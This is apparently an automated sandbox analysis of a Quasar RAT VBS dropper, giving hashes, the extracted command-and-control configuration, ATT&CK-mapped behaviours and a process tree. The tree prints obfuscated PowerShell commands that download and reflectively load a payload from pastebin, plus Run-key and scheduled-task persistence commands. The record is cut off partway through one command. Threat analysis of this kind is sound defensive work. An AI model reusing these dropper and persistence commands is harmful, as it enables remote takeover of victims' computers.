quasar | 800b825fcf42dff45acf54bacae007176e930669987148d139693ff4fae6c807

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2023, 01:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
Size

213KB
MD5

2ee3aa9bc2da3fce27fe025356ae13b1
SHA1

d6c9f20fbfef8b1dca77e002c4ad2b9f7cad13c5
SHA256

77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1
SHA512

44d12a96f0c6ab16de52ebaae017f4e5e755831bfc9fe4704c560cb92f31f520737cf60949e89ea9e79bd744fa2065a0b29d90d4a033404e3fbdcf1c974b1f28
SSDEEP

3072:u5d6525555555e555555555555p5555+Ji555tp:R

Score

10^/10

quasar acs hope persistence spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/16APD4C6

Extracted

Family

quasar

Version

1.3.0.0

Botnet

ACS hope

crazydns.linkpc.net:26133

Mutex

QSR_MUTEX_6iGAmxpR39hpOQEFqk

Attributes

encryption_key
qiJ37BhO6EEtAoSo8ukb
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/3860-224-0x0000000000400000-0x000000000045E000-memory.dmp	family_quasar

Blocklisted process makes network request 12 IoCs

flow	pid	Process
9	4384	powershell.exe
17	4384	powershell.exe
29	4384	powershell.exe
47	4608	powershell.exe
48	4608	powershell.exe
68	4608	powershell.exe
70	5036	powershell.exe
71	5036	powershell.exe
72	5036	powershell.exe
76	2304	powershell.exe
77	2304	powershell.exe
78	2304	powershell.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyUWM.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyUWM.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eyUWM.lnk	powershell.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eyUWM = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eyUWM = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eyUWM = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4384 set thread context of 3860	4384	powershell.exe	93
PID 5036 set thread context of 2004	5036	powershell.exe	130
PID 2304 set thread context of 1532	2304	powershell.exe	145

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
652	schtasks.exe
5076	schtasks.exe
2524	schtasks.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
4952	powershell.exe
4952	powershell.exe
4384	powershell.exe
4384	powershell.exe
4384	powershell.exe
3472	powershell.exe
1688	powershell.exe
3908	powershell.exe
1688	powershell.exe
4960	powershell.exe
3908	powershell.exe
4960	powershell.exe
3472	powershell.exe
3908	powershell.exe
3976	powershell.exe
3976	powershell.exe
4384	powershell.exe
4384	powershell.exe
400	powershell.exe
400	powershell.exe
4596	powershell.exe
4596	powershell.exe
4608	powershell.exe
4608	powershell.exe
1844	powershell.exe
1844	powershell.exe
632	powershell.exe
632	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
4756	powershell.exe
1228	powershell.exe
2060	powershell.exe
4756	powershell.exe
1228	powershell.exe
2060	powershell.exe
4756	powershell.exe
4352	powershell.exe
4352	powershell.exe
4968	powershell.exe
4968	powershell.exe
2264	powershell.exe
2264	powershell.exe
5024	powershell.exe
5024	powershell.exe
2304	powershell.exe
2304	powershell.exe
2304	powershell.exe
444	powershell.exe
3940	powershell.exe
3940	powershell.exe
444	powershell.exe
4272	powershell.exe
3940	powershell.exe
1136	powershell.exe
4272	powershell.exe
1136	powershell.exe
5048	powershell.exe
5048	powershell.exe
2304	powershell.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	3908	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	3860	aspnet_compiler.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	4756	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3860	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3080 wrote to memory of 4952	3080	WScript.exe	82
PID 3080 wrote to memory of 4952	3080	WScript.exe	82
PID 4952 wrote to memory of 4384	4952	powershell.exe	84
PID 4952 wrote to memory of 4384	4952	powershell.exe	84
PID 4384 wrote to memory of 3908	4384	powershell.exe	85
PID 4384 wrote to memory of 3908	4384	powershell.exe	85
PID 4384 wrote to memory of 3472	4384	powershell.exe	86
PID 4384 wrote to memory of 3472	4384	powershell.exe	86
PID 4384 wrote to memory of 4960	4384	powershell.exe	89
PID 4384 wrote to memory of 4960	4384	powershell.exe	89
PID 4384 wrote to memory of 2540	4384	powershell.exe	88
PID 4384 wrote to memory of 2540	4384	powershell.exe	88
PID 4384 wrote to memory of 1688	4384	powershell.exe	87
PID 4384 wrote to memory of 1688	4384	powershell.exe	87
PID 2540 wrote to memory of 2524	2540	cmd.exe	90
PID 2540 wrote to memory of 2524	2540	cmd.exe	90
PID 3908 wrote to memory of 3976	3908	powershell.exe	91
PID 3908 wrote to memory of 3976	3908	powershell.exe	91
PID 4384 wrote to memory of 4832	4384	powershell.exe	92
PID 4384 wrote to memory of 4832	4384	powershell.exe	92
PID 4384 wrote to memory of 4832	4384	powershell.exe	92
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 4384 wrote to memory of 3860	4384	powershell.exe	93
PID 1720 wrote to memory of 400	1720	wscript.exe	101
PID 1720 wrote to memory of 400	1720	wscript.exe	101
PID 400 wrote to memory of 984	400	powershell.exe	103
PID 400 wrote to memory of 984	400	powershell.exe	103
PID 984 wrote to memory of 4596	984	wscript.exe	104
PID 984 wrote to memory of 4596	984	wscript.exe	104
PID 4596 wrote to memory of 4608	4596	powershell.exe	106
PID 4596 wrote to memory of 4608	4596	powershell.exe	106
PID 1548 wrote to memory of 1844	1548	wscript.exe	117
PID 1548 wrote to memory of 1844	1548	wscript.exe	117
PID 1844 wrote to memory of 2760	1844	powershell.exe	119
PID 1844 wrote to memory of 2760	1844	powershell.exe	119
PID 2760 wrote to memory of 632	2760	wscript.exe	120
PID 2760 wrote to memory of 632	2760	wscript.exe	120
PID 632 wrote to memory of 5036	632	powershell.exe	122
PID 632 wrote to memory of 5036	632	powershell.exe	122
PID 5036 wrote to memory of 4756	5036	powershell.exe	123
PID 5036 wrote to memory of 4756	5036	powershell.exe	123
PID 5036 wrote to memory of 1228	5036	powershell.exe	124
PID 5036 wrote to memory of 1228	5036	powershell.exe	124
PID 5036 wrote to memory of 2060	5036	powershell.exe	125
PID 5036 wrote to memory of 2060	5036	powershell.exe	125
PID 5036 wrote to memory of 4272	5036	powershell.exe	126
PID 5036 wrote to memory of 4272	5036	powershell.exe	126
PID 4272 wrote to memory of 652	4272	cmd.exe	128
PID 4272 wrote to memory of 652	4272	cmd.exe	128
PID 4756 wrote to memory of 4352	4756	powershell.exe	129
PID 4756 wrote to memory of 4352	4756	powershell.exe	129
PID 5036 wrote to memory of 4968	5036	powershell.exe	127
PID 5036 wrote to memory of 4968	5036	powershell.exe	127
PID 5036 wrote to memory of 2004	5036	powershell.exe	130
PID 5036 wrote to memory of 2004	5036	powershell.exe	130
PID 5036 wrote to memory of 2004	5036	powershell.exe	130
PID 5036 wrote to memory of 2004	5036	powershell.exe	130
PID 5036 wrote to memory of 2004	5036	powershell.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1688
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2540
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
        5⤵
        Creates scheduled task(s)
        
        PID:2524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4832
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3860

C:\Windows\system32\wscript.exe
wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4608

C:\Windows\system32\wscript.exe
wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G